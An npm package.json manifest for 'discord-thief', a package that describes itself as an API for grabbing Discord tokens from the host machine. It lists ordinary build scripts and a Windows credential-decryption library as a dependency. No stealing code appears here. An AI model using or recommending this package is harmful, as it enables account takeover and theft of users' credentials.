{
    "name": "discord-thief",
    "version": "0.1.2",
    "description": "API for grabbing Discord tokens from the host machine.",
    "main": "dist/index.js",
    "types": "dist/index.d.ts",
    "author": "Braden Lamb <braden@int24.io>",
    "license": "UNLICENSED",
    "private": false,
    "scripts": {
        "prepare": "husky install",
        "prepublishOnly": "yarn build",
        "build": "tsc --project tsconfig.json",
        "pretest": "yarn build",
        "test": "node dist/test.js",
        "lint": "eslint .",
        "format": "prettier --write ."
    },
    "dependencies": {
        "jscrypto": "^1.0.3"
    },
    "devDependencies": {
        "@types/node": "18.0.6",
        "@typescript-eslint/eslint-plugin": "5.30.7",
        "@typescript-eslint/parser": "5.30.7",
        "eslint": "8.20.0",
        "husky": "8.0.1",
        "lint-staged": "13.0.3",
        "prettier": "2.7.1",
        "typescript": "4.7.4"
    },
    "optionalDependencies": {
        "win32crypt": "0.2.1"
    },
    "lint-staged": {
        "*.{js,ts,yml,yaml,json}": "prettier --write",
        "*.{js,ts}": "eslint --fix"
    }
}
